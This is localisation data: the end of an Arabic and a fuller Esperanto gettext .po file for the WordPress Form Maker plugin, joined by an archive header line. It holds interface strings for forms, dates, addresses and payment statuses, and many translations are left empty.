#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "GO "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "إعادة تعيين "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "حدد حقل "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "تحديد تاريخ"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-eo_EO.po000060400000056642152434416630012201 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 16:53+0400\n"
"PO-Revision-Date: 2015-05-22 16:53+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: eo\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Strato Adreso"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Strato Adreso Linio 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Urbo"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Ŝtato / Provinco / Regiono"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Bildkarto / Poŝtkodo"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Lando"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Januaro"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "Februaro"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "Marto"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "Aprilo"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Majo"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "Junio"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Julio"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "Aŭgusto"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "Septembro"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "Oktobro"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "Novembro"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "Decembro"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Eraro, malĝusta Sekureca kodo."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr "Via IP estas lerta nigra. Bonvolu kontakti la retejo administranto. "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "La dosiero superas la permesita grandeco de"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Pardonu, vi ne rajtas alŝuti tiajn dosierojn."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Eraro, dosiero ne povas esti movita."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr ""
"Ĉi tiu kampo %s postulas unika eniro kaj ĉi tiu valoro estis jam donita."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Eraro, retpoŝto ne estis sendita."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Nenio donita."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Via aspekto estis sukcese afiŝita."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Eraro, retpoŝto ne estis sendita."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Via retpoŝta adreso estas jam kontrolita."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Via retpoŝta sukcese kontrolita."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Via retpoŝta verificación estas ekster la datlimo."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Verificación ligilo estas nevalida."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "kampo estas bezonata."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Tio ne estas valida retadreso."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr "Vi ne povas elekti eksa datoj. Elektu daton ekde la nuna."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "la "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "valoro devas esti inter "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "kvanto "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Viaj partituro devus esti malpli ol "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Titolo"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "Unua"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Lasta"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Meza"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Areo Kodo"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Phone Number"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "dolaroj "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "cendojn "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "From "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "al"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "iri "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "Restarigi "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Elektu Kampo"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Elektu Dato"

